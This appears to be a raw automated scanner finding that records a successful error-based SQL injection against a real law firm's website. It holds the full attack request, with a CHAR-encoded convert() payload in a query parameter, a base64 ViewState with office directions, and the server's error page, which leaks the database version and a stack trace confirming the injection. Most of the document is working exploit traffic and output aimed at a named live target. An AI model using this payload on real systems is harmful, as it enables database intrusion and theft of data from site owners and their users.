__VIEWSTATE POST dDwxMDQyMzE4MTAwO3Q8O2w8aTwxPjtpPDM Oz47bDx0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDA O2k8MT47PjtsPHQ8O2w8aTwzPjs O2w8dDxwPHA8bDxUZXh0Oz47bDxcPHBcPlw8c3Ryb25nXD5WaWV3IG91ciZuYnNwXDtcPGEgY2xhc3M9bGlua19zbV9sdGJsdWUgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQzMyIgaHR0cDogd3d3Lm1jY2FydGVyLmNvbSB3d3cyIGJpb3NuZXcuYXNweD9TZWFyY2g9J1RydWUmYW1wXDtMb2NhdGlvbj04IidcPiZuYnNwXDtCT1NUT04gT2ZmaWNlIExhd3llcnNcPC9hXD5cPGEgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQiXD5cPC9hXD5cPC9zdHJvbmdcPlw8L3BcPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9wXD5cPGZvbyBmYWNlPUFyaWFsIHNpemU9Mlw DQpcPHAgYWxpZ249bGVmdFw XDxzdHJvbmdcPkRpcmVjdGlvbnMgdG8gQm9zdG9uIE9mZmljZSBHYXJhZ2U6XDwvc3Ryb25nXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPHN0cm9uZ1w RnJvbSBwb2ludHMgTm9ydGg6IFw8L3N0cm9uZ1w VGFrZSBSb3V0ZSA5MyBTb3V0aCB0byBleGl0IDI0QS4gRXhpdCAyNEEgaXMgb24gdGhlIHJpZ2h0LCBhYm91dCAmIzE4OFw7IG1pbGUgYWZ0ZXIgeW91IGVudGVyIHRoZSB0dW5uZWwuIFN0YXkgdG8gdGhlIHJpZ2h0IHNpZGUgb2YgdGhlIGV4aXQgcmFtcCB1bnRpbCBleGl0IDI0QSBqb2lucyB0aGUgSkZLIFN1cmZhY2UgUm9hZCBhdCB0aGUgdHJhZmZpYyBsaWdodHMuIFRha2UgYSBsZWZ0IGF0IHRoZSBlbmQgb2YgdGhlIG9mZiByYW1wIChhdCBsaWdodHMpLiBGb2xsb3cgdGhlIFN1cmZhY2UgUm9hZCwga2VlcGluZyBCb3N0b24gSGFyYm9yIGFuZCB0aGUgTWFycmlvdHQtTG9uZyBXaGFyZiBIb3RlbCB0byB5b3VyIGxlZnQuIFRha2UgYSByaWdodCB0dXJuIG9udG8gQnJvYWQgU3RyZWV0LCBqdXN0IGFmdGVyIHBhc3NpbmcgdGhlIEhhcmJvciBQYXJraW5nIEdhcmFnZSBvbiB5b3VyIGxlZnQuIFRha2UgdGhlIDFzdCBsZWZ0LCB3aGljaCBpcyBGcmFua2xpbiBTdHJlZXQuIFByb2NlZWQgc3RyYWlnaHQgZm9yIDMgYmxvY2tzIGFuZCB0YWtlIGEgcmlnaHQgb250byBQZWFybCBTdHJlZXQsIGFuZCBhbiBpbW1lZGlhdGUgbGVmdCBpbnRvIHRoZSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIHBhcmsuIFw8aVw Rm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9pXD5cPHN0cm9uZ1w RnJvbSBwb2ludHMgU291dGg6Jm5ic3BcO1w8L3N0cm9uZ1w VGFrZSBSb3V0ZSA5MyBOb3J0aCB0byB0YWtlIGV4aXQgMjMuIFRha2UgYW4gaW1tZWRpYXRlIGxlZnQgb2ZmIHRoZSBleGl0IG9udG8gSm9obiBGLiBGaXR6Z2VyYWxkIFN1cmZhY2UgUmQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMsIGF0IHRoZSBGcmFua2xpbiBTdHJlZXQgaW50ZXJzZWN0aW9uLCB0aGUgZW50cmFuY2UgdG8gdGhlIGdhcmFnZSB3aWxsIGJlIGltbWVkaWF0ZWx5IG9uIHRoZSBsZWZ0LiBcPGVtXD5Gb3Igd2Fsa2luZyBkaXJlY3Rpb25zIGZyb20gdGhlIGdhcmFnZSB0byBvdXIgYnVpbGRpbmcsIHBsZWFzZSBzZWUgYmVsb3cuIFw8L2VtXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9mb29cPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD5cPHN0cm9uZ1w RnJvbSBMb2dhbiBBaXJwb3J0OiBcPC9zdHJvbmdcPkZvbGxvdyB0aGUgQWlycG9ydCBleGl0IHNpZ25zIHRvIEktOTAgV2VzdC9UaGUgVGVkIFdpbGxpYW1zIFR1bm5lbC4gVGFrZSBleGl0IDI1IC0gU291dGggQm9zdG9uLiBUdXJuIGxlZnQgb250byBOb3J0aGVybiBBdmVudWUvU2VhcG9ydCBCb3VsZXZhcmQuIFlvdSB3aWxsIGdvIG92ZXIgdGhlIE1vYWtsZXkgQnJpZGdlLCBhbmQgY29udGludWUgdG8gZm9sbG93IFNlYXBvcnQgQm91bGV2YXJkLiBUdXJuIGxlZnQgb250byBQdXJjaGFzZSBTdHJlZXQuIFR1cm4gcmlnaHQgb250byBQZWFybCBTdHJlZXQuIEFmdGVyIHRoZSBzZWNvbmQgc2V0IG9mIGxpZ2h0cywgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgb24gdGhlIGxlZnQgaGFuZCBzaWRlLiBcPGlcPkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSB0aGUgZ2FyYWdlIHRvIG91ciBidWlsZGluZywgcGxlYXNlIHNlZSBiZWxvdy4gXDwvcFw DQpcPHAgYWxpZ249bGVmdFw XDwvaVw XDxzdHJvbmdcPkZyb20gdGhlIE1hc3MgUGlrZTombmJzcFw7XDwvc3Ryb25nXD5Gb2xsb3cgdGhlIE1hc3NhY2h1c2V0dHMgVHVybnBpa2UgKDkwIEVhc3QpIGludG8gQm9zdG9uLiBUYWtlIGV4aXQgMjRCIHRvIEktOTMgTm9ydGggdG8gZXhpdCAyMy4gVGFrZSBhbiBpbW1lZGlhdGUgbGVmdCBvZmYgdGhlIGV4aXQgb250byBKb2huIEYuIEZpdHpnZXJhbGQgU3VyZmFjZSBSZC9TdXJmYWNlIFJvYWQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgaW1tZWRpYXRlbHkgb24gdGhlIGxlZnQuIFw8aVw Rm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD5cPC9pXD5cPC9mb29cPg0KXDxwIGFsaWduPWxlZnRcPlw8c3Ryb25nXD4qKkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIDI2NSBGcmFua2xpbiBTdHJlZXQqKlw8L3N0cm9uZ1w XDxpXD5cPGJyXD5cPC9pXD5XaGVuIHlvdSBjb21lIG91dCBvZiB0aGUgR2FyYWdlLCB0dXJuIGxlZnQoc3RheWluZyBvbiBGcmFua2xpbiBTdHJlZXQpYW5kIHByb2NlZWQgdG93YXJkcyB0aGUgTGFuZ2hhbSBIb3RlbC4gV2FsayBzdHJhaWdodCBkb3duIEZyYW5rbGluIFN0cmVldCB0d28gYmxvY2tzIHRvIG91ciBidWlsZGluZyBhdCAyNjUgRnJhbmtsaW4gU3RyZWV0LiBQbGVhc2UgY2hlY2sgaW4gYXQgdGhlIFNlY3VyaXR5IERlc2sgYW5kIHByb2NlZWQgdG8gdGhlIDE0XDxzdXBcPnRoXDwvc3VwXD4gRmxvb3IuIFw8L3BcPlw8Ylw DQpcPHAgYWxpZ249bGVmdFw XDwvcFw DQpcPHAgYWxpZ249bGVmdFw TUJUQSAoU3Vid2F5KSBEaXJlY3Rpb25zIFw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlJlZCBMaW5lXDwvYlw OiBGcm9tIFNvdXRoIFN0YXRpb24gKGV4aXQgdmlhIHRoZSBtYWluIGVudHJhbmNlIGFuZCBjcm9zcyBBdGxhbnRpYyBBdmVudWUgdG8gRmVkZXJhbCBTdHJlZXQpIHByb2NlZWQgdHdvIGJsb2NrcyBhbmQgdGFrZSBhIHJpZ2h0IG9udG8gRnJhbmtsaW4gU3RyZWV0LiBDb250aW51ZSBvbiBGcmFua2xpbiBTdHJlZXQgZm9yIDMgYmxvY2tzLiAyNjUgRnJhbmtsaW4gaXMgb24gdGhlIGNvcm5lciBvZiBGcmFua2xpbiBhbmQgT2xpdmVyLiBcPC9wXD5cPGJcPg0KXDxwIGFsaWduPWxlZnRcPkdyZWVuIExpbmVcPC9iXD46IEZyb20gR292ZXJubWVudCBDZW50ZXIgU3RhdGlvbiwgZ28gbGVmdCBvbnRvIENvdXJ0IFN0cmVldCB3aGljaCB0dXJucyBpbnRvIFN0YXRlIFN0cmVldCBhdCB0aGUgQ29uZ3Jlc3MgU3RyZWV0IGludGVyc2VjdGlvbi4gTWFrZSBhIHJpZ2h0IGF0IENvbmdyZXNzIFN0cmVldCBhbmQgcHJvY2VlZCAzLTQgYmxvY2tzIHRvIEZyYW5rbGluIFN0cmVldC4gVHVybiBsZWZ0IGF0IEZyYW5rbGluIFN0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8Ylw DQpcPHBcPk9yYW5nZS9CbHVlIExpbmVcPC9iXD46IEZyb20gU3RhdGUgU3RyZWV0IFN0YXRpb24sIHRha2UgYSByaWdodCBvbiBDb25ncmVzcyBTdHJlZXQgYW5kIHByb2NlZWQgdGhyZWUgdG8gZm91ciBibG9ja3MgdG8gRnJhbmtsaW4gU3RyZWV0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8L2Zvb1w DQpcPGRpdlw DQpcPGRpdlw DQpcPHBcPk1jQ2FydGVyICZhbXBcOyBFbmdsaXNoIGlzIGxvY2F0ZWQgYXQgMjY1IEZyYW5rbGluIFN0cmVldC4mbmJzcFw7IE91ciBvZmZpY2VzIGFyZSBvbiB0aGUgMTR0aCBmbG9vci4mbmJzcFw7IFBsZWFzZSBjYWxsIHVzIGF0IDYxNy00NDktNjUwMC4gXDwvcFw DQpcPHBcPlNtYXJUcmF2ZWxlciBcPGJyXD5Gb3IgcmVhbC10aW1lLCByb3V0ZS1zcGVjaWZpYyB0cmFmZmljIHJlcG9ydHMsIFNtYXJUcmF2ZWxlciBjYW4gYWxzbyBiZSByZWFjaGVkIGF0IDYxNy0zNzQtMTIzNC5cPGJyXD5cPC9wXD5cPC9kaXZcPlw8L2Rpdlw Oz4 Oz47Oz47Pj47dDw7bDxpPDE Oz47bDx0PHA8cDxsPFRleHQ7PjtsPEJvc3RvbiBNYWluOz4 Oz47Oz47Pj47Pj47Pj47PhAty6L 8bEAq44RzBhw7T/ELP 0

Extracted Data

microsoft sql server 2005 - 9.00.3042.00 (intel x86) feb 9 2007 22:47:07 copyright (c) 1988-2005 microsoft corporation standard edition on windows nt 5.2 (build 3790: service pack 2)

Request

POST /new/showlocationnew.aspx?show=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: http://www.mccarter.com/new/showlocationnew.aspx?show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Content-Length: 6698
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDwxMDQyMzE4MTAwO3Q8O2w8aTwxPjtpPDM%2bOz47bDx0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDA%2bO2k8MT47PjtsPHQ8O2w8aTwzPjs%2bO2w8dDxwPHA8bDxUZXh0Oz47bDxcPHBcPlw8c3Ryb25nXD5WaWV3IG91ciZuYnNwXDtcPGEgY2xhc3M9bGlua19zbV9sdGJsdWUgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQzMyIgaHR0cDogd3d3Lm1jY2FydGVyLmNvbSB3d3cyIGJpb3NuZXcuYXNweD9TZWFyY2g9J1RydWUmYW1wXDtMb2NhdGlvbj04IidcPiZuYnNwXDtCT1NUT04gT2ZmaWNlIExhd3llcnNcPC9hXD5cPGEgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQiXD5cPC9hXD5cPC9zdHJvbmdcPlw8L3BcPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9wXD5cPGZvbyBmYWNlPUFyaWFsIHNpemU9Mlw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDxzdHJvbmdcPkRpcmVjdGlvbnMgdG8gQm9zdG9uIE9mZmljZSBHYXJhZ2U6XDwvc3Ryb25nXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPHN0cm9uZ1w%2bRnJvbSBwb2ludHMgTm9ydGg6IFw8L3N0cm9uZ1w%2bVGFrZSBSb3V0ZSA5MyBTb3V0aCB0byBleGl0IDI0QS4gRXhpdCAyNEEgaXMgb24gdGhlIHJpZ2h0LCBhYm91dCAmIzE4OFw7IG1pbGUgYWZ0ZXIgeW91IGVudGVyIHRoZSB0dW5uZWwuIFN0YXkgdG8gdGhlIHJpZ2h0IHNpZGUgb2YgdGhlIGV4aXQgcmFtcCB1bnRpbCBleGl0IDI0QSBqb2lucyB0aGUgSkZLIFN1cmZhY2UgUm9hZCBhdCB0aGUgdHJhZmZpYyBsaWdodHMuIFRha2UgYSBsZWZ0IGF0IHRoZSBlbmQgb2YgdGhlIG9mZiByYW1wIChhdCBsaWdodHMpLiBGb2xsb3cgdGhlIFN1cmZhY2UgUm9hZCwga2VlcGluZyBCb3N0b24gSGFyYm9yIGFuZCB0aGUgTWFycmlvdHQtTG9uZyBXaGFyZiBIb3RlbCB0byB5b3VyIGxlZnQuIFRha2UgYSByaWdodCB0dXJuIG9udG8gQnJvYWQgU3RyZWV0LCBqdXN0IGFmdGVyIHBhc3NpbmcgdGhlIEhhcmJvciBQYXJraW5nIEdhcmFnZSBvbiB5b3VyIGxlZnQuIFRha2UgdGhlIDFzdCBsZWZ0LCB3aGljaCBpcyBGcmFua2xpbiBTdHJlZXQuIFByb2NlZWQgc3RyYWlnaHQgZm9yIDMgYmxvY2tzIGFuZCB0YWtlIGEgcmlnaHQgb250byBQZWFybCBTdHJlZXQsIGFuZCBhbiBpbW1lZGlhdGUgbGVmdCBpbnRvIHRoZSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIHBhcmsuIFw8aVw%2bRm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9pXD5cPHN0cm9uZ1w%2bRnJvbSBwb2ludHMgU291dGg6Jm5ic3BcO1w8L3N0cm9uZ1w%2bVGFrZSBSb3V0ZSA5MyBOb3J0aCB0byB0YWtlIGV4aXQgMjMuIFRha2UgYW4gaW1tZWRpYXRlIGxlZnQgb2ZmIHRoZSBleGl0IG9udG8gSm9obiBGLiBGaXR6Z2VyYWxkIFN1cmZhY2UgUmQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMsIGF0IHRoZSBGcmFua2xpbiBTdHJlZXQgaW50ZXJzZWN0aW9uLCB0aGUgZW50cmFuY2UgdG8gdGhlIGdhcmFnZSB3aWxsIGJlIGltbWVkaWF0ZWx5IG9uIHRoZSBsZWZ0LiBcPGVtXD5Gb3Igd2Fsa2luZyBkaXJlY3Rpb25zIGZyb20gdGhlIGdhcmFnZSB0byBvdXIgYnVpbGRpbmcsIHBsZWFzZSBzZWUgYmVsb3cuIFw8L2VtXD5cPC9wXD4NClw8cCBhbGlnbj1sZWZ0XD5cPC9mb29cPlw8Zm9vIGZhY2U9QXJpYWwgc2l6ZT0yXD5cPHN0cm9uZ1w%2bRnJvbSBMb2dhbiBBaXJwb3J0OiBcPC9zdHJvbmdcPkZvbGxvdyB0aGUgQWlycG9ydCBleGl0IHNpZ25zIHRvIEktOTAgV2VzdC9UaGUgVGVkIFdpbGxpYW1zIFR1bm5lbC4gVGFrZSBleGl0IDI1IC0gU291dGggQm9zdG9uLiBUdXJuIGxlZnQgb250byBOb3J0aGVybiBBdmVudWUvU2VhcG9ydCBCb3VsZXZhcmQuIFlvdSB3aWxsIGdvIG92ZXIgdGhlIE1vYWtsZXkgQnJpZGdlLCBhbmQgY29udGludWUgdG8gZm9sbG93IFNlYXBvcnQgQm91bGV2YXJkLiBUdXJuIGxlZnQgb250byBQdXJjaGFzZSBTdHJlZXQuIFR1cm4gcmlnaHQgb250byBQZWFybCBTdHJlZXQuIEFmdGVyIHRoZSBzZWNvbmQgc2V0IG9mIGxpZ2h0cywgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgb24gdGhlIGxlZnQgaGFuZCBzaWRlLiBcPGlcPkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSB0aGUgZ2FyYWdlIHRvIG91ciBidWlsZGluZywgcGxlYXNlIHNlZSBiZWxvdy4gXDwvcFw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDwvaVw%2bXDxzdHJvbmdcPkZyb20gdGhlIE1hc3MgUGlrZTombmJzcFw7XDwvc3Ryb25nXD5Gb2xsb3cgdGhlIE1hc3NhY2h1c2V0dHMgVHVybnBpa2UgKDkwIEVhc3QpIGludG8gQm9zdG9uLiBUYWtlIGV4aXQgMjRCIHRvIEktOTMgTm9ydGggdG8gZXhpdCAyMy4gVGFrZSBhbiBpbW1lZGlhdGUgbGVmdCBvZmYgdGhlIGV4aXQgb250byBKb2huIEYuIEZpdHpnZXJhbGQgU3VyZmFjZSBSZC9TdXJmYWNlIFJvYWQvUHVyY2hhc2UgU3RyZWV0LiBDb250aW51ZSBvbiBQdXJjaGFzZSBTdHJlZXQuIFRha2UgYSByaWdodCBvbnRvIFBlYXJsIFN0cmVldC4gKFBlYXJsIFN0cmVldCBpcyBjbGVhcmx5IG1hcmtlZCB3aXRoIGEgc3RyZWV0IHNpZ24uKSBBZnRlciB0aGUgc2Vjb25kIHNldCBvZiBsaWdodHMgYXQgdGhlIEZyYW5rbGluIFN0cmVldCBpbnRlcnNlY3Rpb24sIHRoZSBlbnRyYW5jZSB0byB0aGUgZ2FyYWdlIHdpbGwgYmUgaW1tZWRpYXRlbHkgb24gdGhlIGxlZnQuIFw8aVw%2bRm9yIHdhbGtpbmcgZGlyZWN0aW9ucyBmcm9tIHRoZSBnYXJhZ2UgdG8gb3VyIGJ1aWxkaW5nLCBwbGVhc2Ugc2VlIGJlbG93LiBcPC9wXD5cPC9pXD5cPC9mb29cPg0KXDxwIGFsaWduPWxlZnRcPlw8c3Ryb25nXD4qKkZvciB3YWxraW5nIGRpcmVjdGlvbnMgZnJvbSBQb3N0IE9mZmljZSBTcXVhcmUgR2FyYWdlIHRvIDI2NSBGcmFua2xpbiBTdHJlZXQqKlw8L3N0cm9uZ1w%2bXDxpXD5cPGJyXD5cPC9pXD5XaGVuIHlvdSBjb21lIG91dCBvZiB0aGUgR2FyYWdlLCB0dXJuIGxlZnQoc3RheWluZyBvbiBGcmFua2xpbiBTdHJlZXQpYW5kIHByb2NlZWQgdG93YXJkcyB0aGUgTGFuZ2hhbSBIb3RlbC4gV2FsayBzdHJhaWdodCBkb3duIEZyYW5rbGluIFN0cmVldCB0d28gYmxvY2tzIHRvIG91ciBidWlsZGluZyBhdCAyNjUgRnJhbmtsaW4gU3RyZWV0LiBQbGVhc2UgY2hlY2sgaW4gYXQgdGhlIFNlY3VyaXR5IERlc2sgYW5kIHByb2NlZWQgdG8gdGhlIDE0XDxzdXBcPnRoXDwvc3VwXD4gRmxvb3IuIFw8L3BcPlw8Ylw%2bDQpcPHAgYWxpZ249bGVmdFw%2bXDwvcFw%2bDQpcPHAgYWxpZ249bGVmdFw%2bTUJUQSAoU3Vid2F5KSBEaXJlY3Rpb25zIFw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlJlZCBMaW5lXDwvYlw%2bOiBGcm9tIFNvdXRoIFN0YXRpb24gKGV4aXQgdmlhIHRoZSBtYWluIGVudHJhbmNlIGFuZCBjcm9zcyBBdGxhbnRpYyBBdmVudWUgdG8gRmVkZXJhbCBTdHJlZXQpIHByb2NlZWQgdHdvIGJsb2NrcyBhbmQgdGFrZSBhIHJpZ2h0IG9udG8gRnJhbmtsaW4gU3RyZWV0LiBDb250aW51ZSBvbiBGcmFua2xpbiBTdHJlZXQgZm9yIDMgYmxvY2tzLiAyNjUgRnJhbmtsaW4gaXMgb24gdGhlIGNvcm5lciBvZiBGcmFua2xpbiBhbmQgT2xpdmVyLiBcPC9wXD5cPGJcPg0KXDxwIGFsaWduPWxlZnRcPkdyZWVuIExpbmVcPC9iXD46IEZyb20gR292ZXJubWVudCBDZW50ZXIgU3RhdGlvbiwgZ28gbGVmdCBvbnRvIENvdXJ0IFN0cmVldCB3aGljaCB0dXJucyBpbnRvIFN0YXRlIFN0cmVldCBhdCB0aGUgQ29uZ3Jlc3MgU3RyZWV0IGludGVyc2VjdGlvbi4gTWFrZSBhIHJpZ2h0IGF0IENvbmdyZXNzIFN0cmVldCBhbmQgcHJvY2VlZCAzLTQgYmxvY2tzIHRvIEZyYW5rbGluIFN0cmVldC4gVHVybiBsZWZ0IGF0IEZyYW5rbGluIFN0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8Ylw%2bDQpcPHBcPk9yYW5nZS9CbHVlIExpbmVcPC9iXD46IEZyb20gU3RhdGUgU3RyZWV0IFN0YXRpb24sIHRha2UgYSByaWdodCBvbiBDb25ncmVzcyBTdHJlZXQgYW5kIHByb2NlZWQgdGhyZWUgdG8gZm91ciBibG9ja3MgdG8gRnJhbmtsaW4gU3RyZWV0LiAyNjUgRnJhbmtsaW4gaXMgbG9jYXRlZCBvbiB0aGUgY29ybmVyIG9mIEZyYW5rbGluIGFuZCBPbGl2ZXIuIFw8L3BcPlw8L2Zvb1w%2bDQpcPGRpdlw%2bDQpcPGRpdlw%2bDQpcPHBcPk1jQ2FydGVyICZhbXBcOyBFbmdsaXNoIGlzIGxvY2F0ZWQgYXQgMjY1IEZyYW5rbGluIFN0cmVldC4mbmJzcFw7IE91ciBvZmZpY2VzIGFyZSBvbiB0aGUgMTR0aCBmbG9vci4mbmJzcFw7IFBsZWFzZSBjYWxsIHVzIGF0IDYxNy00NDktNjUwMC4gXDwvcFw%2bDQpcPHBcPlNtYXJUcmF2ZWxlciBcPGJyXD5Gb3IgcmVhbC10aW1lLCByb3V0ZS1zcGVjaWZpYyB0cmFmZmljIHJlcG9ydHMsIFNtYXJUcmF2ZWxlciBjYW4gYWxzbyBiZSByZWFjaGVkIGF0IDYxNy0zNzQtMTIzNC5cPGJyXD5cPC9wXD5cPC9kaXZcPlw8L2Rpdlw%2bOz4%2bOz47Oz47Pj47dDw7bDxpPDE%2bOz47bDx0PHA8cDxsPFRleHQ7PjtsPEJvc3RvbiBNYWluOz4%2bOz47Oz47Pj47Pj47Pj47PhAty6L%2b8bEAq44RzBhw7T%2fELP%2b0

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 17:43:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4176


<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.]
System.Data.SqlClient.SqlDataReader.Read() +176
Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[SqlException]: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.
at System.Data.SqlClient.SqlDataReader.Read()
at Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
